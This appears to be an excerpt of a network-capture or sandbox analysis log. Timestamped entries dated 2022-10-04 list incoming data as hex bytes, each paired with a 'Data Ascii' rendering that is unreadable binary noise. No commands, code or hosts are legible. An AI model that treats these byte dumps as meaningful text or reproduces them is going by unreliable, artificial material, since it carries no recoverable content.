                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13145INData Raw: b8 f8 6c 84 c5 d5 85 1a c4 f6 31 71 d3 37 f8 c4 e7 56 c4 f1 d7 3d 17 89 d3 d8 27 43 87 4b dd 98 4e ad 82 d8 49 6a 6a b2 9b e9 07 4f d2 f0 0c bc a6 a7 47 27 b3 67 57 84 51 9c 09 d7 a2 0f 9d c5 ad 6f 8b b4 23 52 b0 7c d7 a1 ef 89 2f f9 ac 09 98 00 bf 4f 5c cc 7e 4c eb f5 90 b0 87 61 a2 a2 2a ea 49 d0 db 18 7e 42 0a 79 16 44 4a 04 f1 67 dc 18 d5 68 4f f9 35 77 64 91 53 a3 0c ce 63 01 12 b7 13 6f 52 cb cc d5 b9 2c 0f 18 16 ef 73 45 13 22 d5 65 7c 92 9b 67 68 47 6b 6c 32 55 eb 7f 41 1c 51 f7 57 85 66 1e 2c b5 c1 53 14 a0 f7 83 2d 3e 45 df 9b 7a 01 ad 83 84 c8 b2 6f 43 64 b7 77 75 82 9c a9 30 97 24 fa 91 08 a7 7b d3 3e dd af 62 1f c8 fb 8f 2a cf f7 35 5c 46 81 8d 6c d3 bd 36 4e b5 4e 65 f6 c3 66 ae 45 b1 4a e1 2a 4f e5 2d 7f 65 58 5a 92 1b 40 1e a7 e9 7e 2c 0f
                                                                                                                                                                                                                                    Data Ascii: l1q7V='CKNIjjOG'gWQo#R|/O\~La*I~ByDJghO5wdScoR,sE"e|ghGkl2UAQWf,S->EzoCdwu0${>b*5\Fl6NNefEJ*O-eXZ@~,
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13161INData Raw: 8c b6 16 4b 5d c7 a4 4a 5a 5b dc d2 52 d2 3e 64 f3 bf bd 29 62 14 8c 96 8f 7c 8a aa 60 29 f8 0d 81 9b db 44 1a 2b e3 e1 3e aa 3a 03 40 92 9d 8e 39 a2 cb 2c 52 a8 a3 12 10 7e 66 da 53 9c 68 2c 74 7a ad da 42 45 d1 b7 15 a2 56 1f 52 f0 60 86 19 d1 a6 7b f7 2b 67 3c 88 1d ce 19 f2 77 ab 6c e6 a2 ec fb b6 11 6c 89 36 08 6c 6d a1 ee 07 c6 8a dd c6 de 6c a3 b8 97 7f 14 1f 86 d4 fe 88 fe 7a 5f 70 72 08 2b 7c 12 22 3c a1 03 eb ec bf 37 c8 ac 56 de de 5c 06 be 6c a2 29 a5 34 b5 e9 a1 24 16 cc fe fe 8f 91 c4 f7 09 49 c9 67 ba 78 9a 74 ac aa 93 c7 54 d1 23 00 d6 c7 21 5e 3d 74 70 75 1a c2 6d 39 34 54 1d 3e 81 8a 71 2f 28 91 c2 58 56 e8 f0 31 de 69 b8 5c ab f0 2c 32 37 b4 d0 b3 77 34 7a 0c cf 42 36 ca 1c 7f 98 35 f4 12 00 e9 bb cd 4f 50 02 ad 4f 0d 89 90 71 66 5b 46
                                                                                                                                                                                                                                    Data Ascii: K]JZ[R>d)b|`)D+>:@9,R~fSh,tzBEVR`{+g<wll6lmlz_pr+|"<7V\l)4$IgxtT#!^=tpum94T>q/(XV1i\,27w4zB65OPOqf[F
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13177INData Raw: 9d 4b c1 76 67 ff a2 5b 29 25 97 18 14 e8 29 7f e2 94 86 bc 67 5c f4 b2 3f 63 6b 5a dc 08 0f 2c 9e 5c 54 97 36 84 7e f9 4b b3 b9 8a 09 96 84 fc f4 14 07 4b 19 b6 e6 92 19 a0 79 c6 1f 7b 03 dd 43 40 76 e5 c3 f4 34 33 e6 a4 26 2d 3e f0 93 4f 4b 64 4e bd b6 47 a5 f0 47 37 f5 11 cb 14 89 ed ff e0 d4 fe ae 70 39 8c 34 c3 92 bb 75 c8 f6 c3 7a 04 56 c7 5b 9a 24 d9 ac 15 e9 28 2a 9c d9 fa 38 0d 46 e7 8a 89 5f 91 aa a1 cf fe 61 8c e0 69 13 77 47 53 16 df a5 7f 84 eb 02 7e 90 f9 b5 5c 79 33 0f 87 31 83 f6 2f 2b f1 7a d5 28 f6 dc e7 ee 7f 54 0c d0 66 7a a1 b2 2b cf 74 55 c6 8b 16 e5 a6 ea 88 b0 52 e5 72 26 53 3e ee 1e 92 b9 ff 06 2d 84 b1 14 17 ca a4 ca 96 63 ad 2b 37 05 25 13 13 d7 ad e0 7b 1e 0f ed 0f 62 44 5d 35 0f ab 57 64 78 9c d2 13 e4 ac 65 9a ea 50 3d 76 c5
                                                                                                                                                                                                                                    Data Ascii: Kvg[)%)g\?ckZ,\T6~KKy{C@v43&->OKdNGG7p94uzV[$(*8F_aiwGS~\y31/+z(Tfz+tURr&S>-c+7%{bD]5WdxeP=v
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13193INData Raw: 84 59 ad 65 ab a8 5b 23 9c 33 e8 29 38 1a 92 f5 cf da 8d ac e0 1e cd a2 bf 0a 66 68 b7 25 0d af 03 75 73 26 2b d6 33 04 66 65 57 09 5c 18 cd 13 c5 a1 2c 02 96 e1 d3 8b 35 dd 68 1e d2 cc 5d 0e a9 a0 d7 6d dd 15 75 1d 08 06 48 be a7 c5 7d f6 83 f9 9d 96 42 67 93 33 e2 39 47 92 45 62 ce 0b 81 a9 c8 3a 75 0b d6 fd ac e9 dd f4 74 e5 04 48 f8 f7 19 8c a6 fc 13 7a 7e 20 2e 6f e8 2f bf aa f1 7d f7 de e3 b6 d2 f2 b4 ca 9c 31 00 46 02 1a 7d 28 20 5d 36 36 59 d2 b8 e7 d4 ee a1 67 ee 07 82 5c 26 98 2f 6e 75 f5 be 8e a3 31 49 be 6f 03 92 2e 84 8e 9e f7 c7 16 e5 4f 5e 7a ff 68 52 86 e3 9d 2e 79 06 d4 50 0e 65 02 dd be 04 24 a7 dc 62 7b 5f f4 d7 d3 2a d1 f8 9b 35 1e f4 a3 87 4f 74 cb f0 d7 a8 a0 01 b7 11 ee f0 6e e6 a5 47 44 78 93 88 a5 0b 9e d9 d2 85 9d 3a 36 b7 96 db
                                                                                                                                                                                                                                    Data Ascii: Ye[#3)8fh%us&+3feW\,5h]muH}Bg39GEb:utHz~ .o/}1F}( ]66Yg\&/nu1Io.O^zhR.yPe$b{_*5OtnGDx:6
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13209INData Raw: e7 87 0b d6 d0 b6 f0 25 41 95 9d 27 c1 92 65 3b 58 35 a8 7e 48 9d 18 8d 1d ab 0c 8f a9 10 ca 2c f5 fe 3c 88 31 07 ce 4b e4 c1 62 33 7e 73 3f 88 43 37 ec 0e 6d 8c 6b b6 55 e0 79 59 20 06 f3 ad af 85 27 aa 1d 94 c7 14 92 4a 0e 68 5f ae 2f 42 ad a0 90 2a 58 18 30 42 0e 62 ec 78 08 1c 29 0b c7 9f b8 5d c4 43 a3 59 a6 c0 22 46 73 5f 4c d2 7c 90 db e6 0f fa 56 2f 83 45 5d d3 b7 ce b5 d6 42 43 30 0e c3 20 5c bb e9 11 d7 67 15 71 c9 31 b7 50 f0 64 91 03 b7 b1 e6 a5 91 09 c9 76 56 d5 0c 53 02 53 b4 12 c3 73 38 d9 17 8a de 38 8b ce 5d c9 06 e2 25 7d 1c da 61 43 1c db c7 c5 2c 4e 31 b7 2d 93 b8 b8 91 f0 8a f4 6f cb 41 f9 2e 23 78 f6 e7 74 cb de 73 e9 8f 93 1e 26 33 11 c3 41 80 d9 13 81 4d 85 76 ca 2e 58 c2 21 69 7f d1 c2 b2 5b a7 d8 c1 f8 7e 8d 17 2f 2e 2b 6a 78 f4
                                                                                                                                                                                                                                    Data Ascii: %A'e;X5~H,<1Kb3~s?C7mkUyY 'Jh_/B*X0Bbx)]CY"Fs_L|V/E]BC0 \gq1PdvVSSs88]%}aC,N1-oA.#xts&3AMv.X!i[~/.+jx
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13225INData Raw: 90 75 77 79 bf e6 9c ce e5 9d 13 b8 fb 03 dd fb 63 54 ae 03 15 2a 9e 08 48 fc d5 cc 66 10 f0 ab 85 95 d6 62 8d 5d 06 ff 8e 67 6b 9b cf cb d7 2c eb e5 9b c2 58 1b b6 3c 1e f0 6a 41 e0 4a cc 92 da 0d 99 62 83 72 ed 03 18 19 53 b3 9a c5 48 72 ba bb 3d 0f ba 9b 4b 34 f4 80 79 5d 4a a1 49 70 f2 9d 79 72 7d a5 0d 85 08 ee 59 48 92 8a 91 fb d4 e1 c6 a2 b6 b2 5b 6d b0 5c a6 7d f9 66 fc 22 fc 83 af 73 cb 5b 5e 10 62 62 ed fe e0 6a 06 e1 59 1f a3 1c be 31 01 bc 30 24 60 8d 0d af 7e ee a2 c5 1a b4 2a 30 d1 d6 18 89 9b e3 ad 97 4b 7e 85 91 e9 95 ae 72 7f bf fc 01 6e 90 02 f7 e8 39 b3 05 a5 df e3 fb 94 d1 f9 8a 49 ef 51 c2 e8 38 61 30 2d fc 27 a7 7d fa 91 5f 89 fa db 23 27 fc c9 bb 6f 38 9b 24 82 d5 46 e4 4d 84 d0 a5 10 24 f1 fc 4c 09 e8 38 56 85 77 c3 ef 96 4a 4f b2
                                                                                                                                                                                                                                    Data Ascii: uwycT*Hfb]gk,X<jAJbrSHr=K4y]JIpyr}YH[m\}f"s[^bbjY10$`~*0K~rn9IQ8a0-'}_#'o8$FM$L8VwJO
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13241INData Raw: 1b 65 9b 1b 29 79 bd 63 e6 a4 a3 49 fd 44 8a cc 7e 57 80 e9 b5 99 f5 35 52 0f 22 11 86 24 db 3e 21 55 19 fa a6 b3 f4 6d 93 18 3e 32 67 9f ca 4d a7 be 95 fe 00 30 b7 95 2d 63 4e bd c1 99 7b 08 3c 39 59 07 e2 b7 1d 41 84 88 7d 6e 5f 1a a1 39 22 e6 70 f2 99 47 1c f4 61 65 48 bc 6e 0b 52 d7 96 f4 e0 70 86 34 a5 da 1d 16 11 e4 bb ff 22 ce 17 c5 32 0f 7c 45 03 3b 89 6b f5 44 26 b7 11 81 0d fe 1f dd a1 a6 73 48 42 73 bb 36 8e cb 93 06 7a 7e 81 50 9c 04 b0 07 a1 82 61 cb 9d d7 53 9a c5 17 10 3b 74 c2 be f4 c0 a2 fd 06 1e bc c2 42 85 4e 01 ce 7d 8a 55 7f c0 c9 d2 3f e1 bf b9 23 8f fb f5 4a e7 12 e6 88 c4 f7 9e c3 f8 26 99 ef f9 11 f2 0e a3 af 13 6b 95 95 60 40 4a e0 c3 62 83 91 1b 36 a2 22 d0 4b 81 31 66 15 80 2d 97 cd 30 88 08 3c 17 cb b2 bd 81 fc f2 c7 76 d6 3e
                                                                                                                                                                                                                                    Data Ascii: e)ycID~W5R"$>!Um>2gM0-cN{<9YA}n_9"pGaeHnRp4"2|E;kD&sHBs6z~PaS;tBN}U?#J&k`@Jb6"K1f-0<v>
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13257INData Raw: 45 dd fd c6 e6 34 b6 12 49 8e b4 e9 e1 9e f1 b1 9b 76 65 46 44 5b 15 a3 5c 74 84 95 15 ca 68 cb ec e0 de a5 8e 6e 56 e2 9c 97 7f c4 8e 2b e5 fe f3 97 04 13 16 fe 5e 65 84 91 da f5 ef 2b 4f 85 29 bf 91 50 fb 30 3d 32 e4 1e 3f e9 b5 91 70 2a 31 4d f2 97 80 5e 41 d4 d0 00 f1 40 40 b3 28 bc bb 94 74 98 eb d9 57 3c d8 e7 67 77 71 0a 38 8d 61 1c 6f e4 24 01 df ad 43 cf 69 d8 60 ab 8b 6d 0b 01 db f4 b7 95 00 cb 57 53 15 57 c1 1c ff 3c 96 00 08 98 61 73 c1 5a 8b 39 85 0e e5 af 4a 88 76 5e 9a 75 20 e0 ce 91 52 1a 59 74 0e e8 ed b6 66 b3 54 68 51 02 78 5c 57 4b ba a9 b5 e6 f3 6c 30 34 fd eb 0d 3e a8 27 e8 24 ff 97 6a 1a 7a a1 52 2b d2 17 34 ac 46 29 d1 42 ca e8 f1 a7 5d 67 c0 d6 e7 3e 58 20 9a f3 c8 bf 31 ba 20 64 b4 f2 5f d1 fe c1 2b e8 26 7f c5 e3 d3 44 f8 ac ab
                                                                                                                                                                                                                                    Data Ascii: E4IveFD[\thnV+^e+O)P0=2?p*1M^A@@(tW<gwq8ao$Ci`mWSW<asZ9Jv^u RYtfThQx\WKl04>'$jzR+4F)B]g>X 1 d_+&D
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13273INData Raw: e4 5e d2 a2 65 eb 5a 0c ba 42 f2 e6 a4 be 9a d0 24 6a 76 52 ec e2 b7 34 7e f9 e8 49 c0 1a 0f 99 09 0f 57 75 b4 33 71 09 d5 41 98 a0 1f 9d 22 28 25 04 ba f2 a3 cb de 7d c2 47 ee 96 2a 6d ef ef 29 84 f0 5c 92 fe ee 70 d5 75 c2 7d b8 c8 1d a6 64 c1 89 b7 1a 89 62 fc d8 72 6d 60 b2 4b fa c0 f3 23 46 41 99 56 ac 72 ec 72 d2 9c bf 65 fe 4f 90 26 93 22 2d 3f e9 da 93 d3 5a 21 9b 11 ee 58 96 a7 fb d4 57 c8 24 2e 3a d6 dc 44 cb 93 78 d0 ca 07 91 95 59 60 28 2a bc ec e3 4b 33 d2 1b 64 a0 f3 6c b9 14 51 cc 9b f0 f3 17 c3 85 e8 80 f6 d6 10 00 d1 63 86 12 c9 e8 e4 54 a7 aa b6 f3 83 18 2f 32 2d f5 99 c4 c8 63 77 95 0f ac e8 ba 0b 47 a6 0c df 42 f3 79 cb 61 e6 e4 c1 2a 52 e9 80 82 7c 2e c4 66 34 c8 98 cd 2f 42 67 e4 8e 73 49 e0 06 be a4 c9 3b c7 19 9c de 66 06 c7 e4 93
                                                                                                                                                                                                                                    Data Ascii: ^eZB$jvR4~IWu3qA"(%}G*m)\pu}dbrm`K#FAVrreO&"-?Z!XW$.:DxY`(*K3dlQcT/2-cwGBya*R|.f4/BgsI;f
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13289INData Raw: ce ba f4 c2 dc 54 29 ed 90 f4 6a f1 37 e8 3e f5 c1 eb 45 26 9e 71 dd 38 fd 31 12 7d f1 25 da 14 a3 c9 3a 55 37 33 71 ef a7 73 23 df a9 04 c6 eb ef bc 14 aa 63 54 fb 39 76 8e 71 41 10 12 86 a2 87 86 2e c8 73 5f bd 17 3b 52 1f c5 27 80 3d e9 cd f1 59 04 0f 62 cc 11 6c ca e1 9d 54 20 2c 5d 6d 16 da b3 ec 6e 51 f9 8f 10 a8 fc 06 13 83 7b 6c 35 61 84 e9 0e e4 1b a2 e9 28 34 e7 4d 96 9c 41 50 7e e4 1f 4b 18 49 a4 f3 02 7e b5 37 4d fe 40 9b c5 4a 82 af 86 6e 50 07 f8 43 b7 94 6a cc 9b 5f ee cf 9a b0 e6 5c 20 0c 10 9a 42 4d 0f d3 49 a8 c7 95 f7 a4 99 a7 35 97 18 dd c1 ab 79 a2 56 84 0c 22 50 2c 3d fe 8e f6 f2 57 22 ec 5b dc 85 e8 ba 0f 88 78 d9 dd 4f 5e c1 c5 a6 0e 8a db f2 9c 92 b1 81 fb af 69 70 96 5b 12 f1 63 24 fd 81 55 a1 d4 3d d5 99 24 00 d7 0a 9d 70 ac bd
                                                                                                                                                                                                                                    Data Ascii: T)j7>E&q81}%:U73qs#cT9vqA.s_;R'=YblT ,]mnQ{l5a(4MAP~KI~7M@JnPCj_\ BMI5yV"P,=W"[xO^ip[c$U=$p
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13305INData Raw: d8 1f 53 62 c3 b4 3d b4 4b 05 63 4a a3 02 bc 46 d2 ed af dd 98 e5 74 98 5a 09 88 9a ca e0 55 40 d8 07 84 af 35 ec 60 3c a6 c2 00 3a bc a8 ff e1 35 af 56 bb 0b cf ad 9c eb 15 e1 e2 f7 1f 0c 44 ec 34 e5 f9 58 20 a8 9c d9 4a f7 ae 5c 11 21 7c 72 da e1 e3 4b 69 92 51 00 0c 4f 46 86 29 16 fd 95 6f 33 18 70 87 d4 3e 96 cf e5 b0 54 c4 74 9f b8 f0 af 9a 3d cb 66 ca 6c 6b e2 ea 71 b9 95 54 b9 3a a7 dd 78 89 cc a6 e4 c2 6f dd 9b 84 d8 70 78 7b 39 de 16 32 17 85 78 94 8f 54 85 17 28 80 34 38 20 f1 af a6 bb 87 68 cd 30 4b 1d 4c 32 81 bc 33 62 e0 35 45 cc 66 c1 a3 b2 25 65 8d 91 d9 59 c6 76 d0 4e cc dc c8 84 2f 81 a9 53 fc 7c fa 4e b4 0a 9e 07 13 da 95 db 5f f1 30 83 91 2f 25 cc 08 b8 3e 16 92 ce 75 cf 6f 61 5e 5e 60 ec 1a 9e 49 13 46 6d ec 2e cb db a6 69 7d c6 04 c7
                                                                                                                                                                                                                                    Data Ascii: Sb=KcJFtZU@5`<:5VD4X J\!|rKiQOF)o3p>Tt=flkqT:xopx{92xT(48 h0KL23b5Ef%eYvN/S|N_0/%>uoa^^`IFm.i}
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13321INData Raw: 52 19 48 62 ac a5 6e ab 66 90 d6 52 90 9e 0d cc 38 d7 cd 43 31 76 fb 7f 54 18 0b b6 7e c2 b9 d3 37 31 ca a7 ed 87 a9 d5 de fd 60 f3 cc df 1f 7a e4 f2 29 29 ad 72 29 aa e6 84 de 9c 5d 91 97 22 a0 2e ad 54 92 3d 34 c7 db 18 c6 3e c4 2e 58 8f 9b 55 c8 30 60 3b ff ff ff 4f a9 94 18 84 a3 b1 d2 e6 7b ff 84 3b 2b 62 0f 81 16 84 b5 92 19 8d 60 9e e0 03 f6 24 09 ce 46 77 d0 1d 84 93 00 19 01 c1 56 dd 4a ea eb 7d 65 4f 00 00 00 00 9c 92 c2 cd 95 d2 6a e1 7b 13 fd d3 ad a4 5c b1 16 f6 83 a5 98 cf 74 7f 13 84 d2 b5 39 38 22 f8 1f 44 ea 90 0a 92 b0 00 00 00 e0 dd 5e 1b ce eb cc 59 e9 7b b8 fa e9 ec 7b 20 64 43 dd 8d f8 f5 9d fa ce 9d e5 4a ea fb 07 98 b0 00 00 00 e0 b7 d3 e3 7b b9 f3 c9 b4 15 bb 0c 65 7b 01 00 00 60 8c ef 1e c4 71 4f 01 eb 3b 8f bd d6 ed 3b 26 24 ef
                                                                                                                                                                                                                                    Data Ascii: RHbnfR8C1vT~71`z))r)]".T=4>.XU0`;O{;+b`$FwVJ}eOj{\t98"D^Y{{ dCJ{e{`qO;;&$
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13337INData Raw: d2 da 1e 03 5c 55 7d d9 c4 d4 12 6d 2d d7 52 fd 05 9b 14 79 ea c9 ce c9 ae d8 c9 d4 ce b2 27 4d e0 6f ae 96 28 b7 83 8d 32 d8 3d 40 43 29 3b 5a 9b 27 d3 a9 40 f9 f2 d7 57 db 5d cb d1 8e 86 cf e9 10 e8 ed 07 b7 60 d1 dc fc 91 4d 5f de d6 18 da 1e 0d c9 73 7a 40 eb 46 f5 cf b7 64 c9 54 51 06 12 b2 d0 f4 de 69 82 04 51 d8 a0 b1 4b df 57 93 6d 72 d9 8e b6 17 50 18 e8 35 f7 0e 68 d1 2c bc 28 45 5f 9e 86 a1 d2 1e 5d 69 ca 72 40 4b 9f 5b 87 9a bf 3b d5 a9 ef 92 59 54 96 dd 04 f3 4a 1b 95 58 8e b7 1b 49 a1 09 28 5c b1 c9 5a 2a 5c 26 56 9d ed d4 38 ce 69 fe 52 3e 9e df 3d 79 71 52 8a e0 ae a2 2a 90 e7 b2 c5 8f db 39 00 3e aa b9 af 69 85 0c 13 b1 e4 5c 30 6e 4c e4 a0 a1 e9 d3 a3 90 79 ba d1 a3 97 6e 7d 16 2b 60 e6 89 05 ad f7 ce 3f c6 86 c1 b9 de a5 a6 62 4f 96 51
                                                                                                                                                                                                                                    Data Ascii: \U}m-Ry'Mo(2=@C);Z'@W]`M_sz@FdTQiQKWmrP5h,(E_]ir@K[;YTJXI(\Z*\&V8iR>=yqR*9>i\0nLyn}+`?bOQ
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13353INData Raw: 3f 24 1d be 12 18 90 2d 39 00 14 50 9b 27 53 2d ca 1b 48 51 3b 4a ba e2 92 e0 26 ff 6e c0 86 1b 85 4d 16 d9 e6 46 34 00 eb af 64 f8 7f be 7e 1b e7 5e c9 ba 8c 23 1b 1a d9 03 c4 a2 e8 26 a6 a9 4a 00 4b 8a 66 9f 0d aa d4 2d 4b 32 f5 3d b4 07 79 a1 4f 48 76 53 af 27 b3 04 2f ad 66 da ed b7 6f 9f 5e ee 5d 99 bd 86 9d 88 9e 15 c3 3e d3 39 14 ac 02 42 05 a6 66 27 0e 04 40 4a b4 a9 ee 6a ab 06 c3 b4 2a a6 46 1b 5c 38 4e 16 e8 97 ea 9a 26 b5 80 75 83 03 8c 1e 81 49 16 7d 7f 1c b1 c1 69 d9 1f 56 4a a5 b6 fa 32 99 26 dd c4 9c c8 f3 54 9e be fa f0 7a 9a 60 d9 30 77 65 64 d9 09 27 15 41 ed e0 fe 15 44 06 b6 1f 71 45 03 e7 49 b8 9c e0 18 b1 ae cb f5 c2 8b 90 af ff bb f5 8c b0 1b 8a b3 55 f6 0b 36 2f 1e 73 0e b6 68 a5 88 fd 71 18 8e c6 ef c3 dd e7 b1 12 ea b4 e7 b4 f9
                                                                                                                                                                                                                                    Data Ascii: ?$-9P'S-HQ;J&nMF4d~^#&JKf-K2=yOHvS'/fo^]>9Bf'@Jj*F\8N&uI}iVJ2&Tz`0wed'ADqEIU6/shq
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13369INData Raw: c7 ec 35 da b8 c4 55 d9 16 6b a3 f0 50 32 dc 8c 9d 6f fc f3 0c 34 ae ad 5a de 01 1f 4d d6 2a 8a 32 62 bd 90 03 d9 09 4c 7e 03 62 f6 6f 3e 22 50 c1 2b 38 dd dc e8 14 39 c8 8b 1d f2 65 fc 27 36 36 01 85 13 09 90 3e 22 50 c9 34 df e0 2f 86 ed 44 fe 1e 4c fd 6f 3e 22 50 b1 4d 60 67 9d 56 3a 26 be 81 8a 1c 04 cf fe 21 48 5b cc 19 b7 3e 3a 05 2a 8e 53 28 fd d1 ea 4c 5f 55 09 c7 44 51 48 4d be ca be f2 70 ff 21 48 5c 83 83 26 1a 08 31 c8 b6 c3 b7 59 65 fc 07 5d ba 01 96 2a 00 90 3e 22 50 c1 cf 5f c3 6c 49 e1 cc 66 fc d4 1d 38 7f 86 70 fc 6f 3e 22 50 c9 aa 13 83 8a 69 b6 78 87 01 b7 82 ad 24 ac 35 eb c5 7e d0 cb ff 30 fe 21 48 61 27 a0 22 46 40 19 c1 ba cc 9f 08 f1 ed f5 fa 2e 2c f9 33 c5 b7 91 60 b5 70 74 ae e5 f7 47 33 0a 79 9f 25 7e 32 e6 01 49 33 53 49 6e 15
                                                                                                                                                                                                                                    Data Ascii: 5UkP2o4ZM*2bL~bo>"P+89e'66>"P4/DLo>"PM`gV:&!H[>:*S(L_UDQHMp!H\&1Ye]*>"P_lIf8po>"Pix$5~0!Ha'"F@.,3`ptG3y%~2I3SIn
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13384INData Raw: 90 a9 e7 7d 43 72 5a 38 ef 73 7b 65 59 75 10 92 92 ef 6c 79 58 4f 0d e7 78 7b 32 7f 14 96 89 e9 6d 7b 7b 4c 03 ef 7a 7a 5e 3c e0 45 3c c7 78 ab 45 a3 f7 a6 52 02 5c 97 76 01 00 5c f8 51 c6 c7 d4 3e 69 32 d4 52 38 69 84 17 79 07 cd d1 ca ae 1d a5 cb cd b2 4a 20 80 13 00 70 75 e2 85 69 5b 5b 48 9b e4 ea 1f 35 66 e4 8f 86 b2 f9 a3 d6 c6 e1 fb a3 28 f9 26 3c 2b 16 01 d2 2f ad 51 81 64 ec 86 4e 7d 31 31 51 ed 3d 2b 36 4d d3 38 60 e8 ff e9 78 69 02 97 5a 50 14 78 f3 ce b9 c3 bf 43 29 27 ff 7f 13 cc 78 5d 6d dd 40 5f 4f 97 54 d7 1e 4c b8 3f 77 40 9a 4f b9 c2 b7 6d 48 18 5c 06 93 33 9c f9 de e8 23 48 5c d8 01 38 07 d2 57 1a dc 3e d4 8e 07 2e 1c 15 e8 0c ae 42 65 d1 75 b5 64 48 5f 97 a7 ed df 1e 7c a0 86 7f 40 82 0f 00 ca b7 2d 88 a1 54 06 53 33 25 f1 de e8 3b f1
                                                                                                                                                                                                                                    Data Ascii: }CrZ8s{eYulyXOx{2m{{Lzz^<E<xER\v\Q>i2R8iyJ pui[[H5f(&<+/QdN}11Q=+6M8`xiZPxC)'x]m@_OTL?w@OmH\3#H\8W>.BeudH_|@-TS3%;
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13400INData Raw: 9d 01 d9 73 df 72 a4 99 a0 30 82 a6 82 19 b2 ac 0a ea d7 bb 50 46 bc b4 74 3f f0 f0 5c 3e 38 65 bf b2 06 57 ea e1 f1 e7 8f de 4b 55 89 e0 17 c6 86 42 2a e8 bb 09 84 14 40 4b dd d6 39 5e 64 86 29 28 ff ff ff 1f 47 f6 d7 ff 2b 49 16 1d d5 37 d8 d9 ff b8 ad 9d 0e ac 9f f1 56 d8 7e 33 ce ff ff ff ff df df 4e 6d 4d 1c 0c 88 32 00 b0 cb e8 cd 1c aa c0 34 68 fe ff ff bf 7c 2c d1 bf 4c 5d 9a 3c 40 dd 8a cb ce bf 43 fa 1a c0 bf 6f 13 3d c8 bf b9 4e 95 2b 40 07 dd bf 3f 40 9b 02 44 cc bf 52 67 c4 30 40 fa e2 fd 33 40 b1 db cb 3f 40 dd f8 2e c4 bf c0 a1 5f 34 40 a1 fe 0e c6 bf d7 16 df c8 bf 43 5f f8 c0 bf f5 c2 50 23 40 6b 49 7a 37 40 0f 1e 81 c4 bf 8e bb ae 53 40 7e 1d 97 b7 ee 4f 67 7b 4c 09 fb 72 78 57 2b d6 3d 86 f0 6c 37 4f f8 2a 50 59 8e 8c 9f a7 2e c5 68 a3
                                                                                                                                                                                                                                    Data Ascii: sr0PFt?\>8eWKUB*@K9^d)(G+I7V~3NmM24h|,L]<@Co=N+@?@DRg0@3@?@._4@C_P#@kIz7@S@~Og{LrxW+=l7O*PY.h
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13416INData Raw: c7 01 3c 00 d2 cd 88 10 5c 63 86 55 21 92 2a 9e de 7e ce 93 99 9e 33 01 b4 92 bd 87 b7 fd 12 c5 b1 b5 92 99 1c 56 4f ad a0 fc 7d 0a 16 b9 35 b0 5f 0b a2 92 d5 1e 20 0e 2d 2d c4 0e 40 d3 cd 87 a4 01 3f b3 15 e2 ef 84 ae 1e cc 45 88 d2 58 44 45 39 6d d4 3b a1 a7 6e eb f9 0f 78 1d 0d 2d c4 c2 55 86 12 6a d9 ea 35 2f dd 68 76 ad c5 39 86 51 e1 25 63 e5 35 10 54 15 84 92 e2 ca 09 88 92 c8 f7 a6 52 21 20 fd 0b 54 41 e2 c5 6f a0 9e 6e 04 c8 aa 9e 4d 3c fe 53 01 90 08 28 56 61 af 95 60 a1 fe 10 29 2e a8 9e ed 18 57 50 41 02 6e fb aa 3e 53 7a e8 ab 9e 3a 6f 53 50 21 8a 9d fe 56 41 96 15 9a a2 9e 86 f4 3d a8 9e b9 fc 0b 51 01 2c f8 dd 54 61 53 15 95 a3 fe bc d9 db aa 9e 2f 6d f0 ad 7e 66 80 e9 86 ab bf b8 c1 12 44 5c 80 7e 2d dc 25 b0 3a 2d c1 e5 23 48 12 94 03 c5
                                                                                                                                                                                                                                    Data Ascii: <\cU!*~3VO}5_ --@?EXDE9m;nx-Uj5/hv9Q%c5TR! TAonM<S(Va`).WPAn>Sz:oSP!VA=Q,TaS/m~fD\~-%:-#H
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13432INData Raw: ad 87 aa 89 db 12 61 51 b1 64 2d a1 10 81 20 2d 25 38 12 52 12 e9 8e f4 6f ad 2d 00 98 e3 6d 59 88 ab 51 52 26 2a a7 e8 2d a5 0d 1d a1 ed c1 45 3f 88 d2 a3 e7 84 c5 52 b4 91 c2 bf d3 b1 c1 cf 0a 81 b8 ea 22 31 ce 83 92 47 73 a4 5d 01 fe a5 4f ab 9e 5f 17 18 ca cb dd 1d b8 ed 91 90 ca ff 33 b1 3d 2e 8e cd 40 15 09 b7 16 ca bc d6 e3 09 92 fb 2b 63 c0 d3 d5 b9 4e 13 16 28 db 2d 72 f1 5e a4 30 f2 90 69 27 5b dd 3e 27 89 fa 49 21 97 20 ed 28 f4 6d 43 2d b3 5a 27 44 4c 7f 3c 89 cd df e8 24 3f 26 f1 74 6d 8c 25 0a 8a f4 92 99 08 12 2c 7a c5 bb ec f6 8d b9 f5 13 7c a7 46 24 43 b1 37 e4 67 59 41 ee 72 01 5d 81 cc f7 56 1a 6e f7 3d c8 d2 0b bf c6 ff 32 b1 3c c2 2b d3 42 15 3d 18 df 5f 20 0b 04 07 92 00 59 aa 1c ea 8e fb b4 ed 7d 58 3c 00 cd 4e c3 1d 44 5c 44 ea d1
                                                                                                                                                                                                                                    Data Ascii: aQd- -%8Ro-mYQR&*-E?R"1Gs]O_3=.@+cN(-r^0i'[>'I! (mC-Z'DL<$?&tm%,z|F$C7gYAr]Vn=2<+B=_ Y}X<ND\D
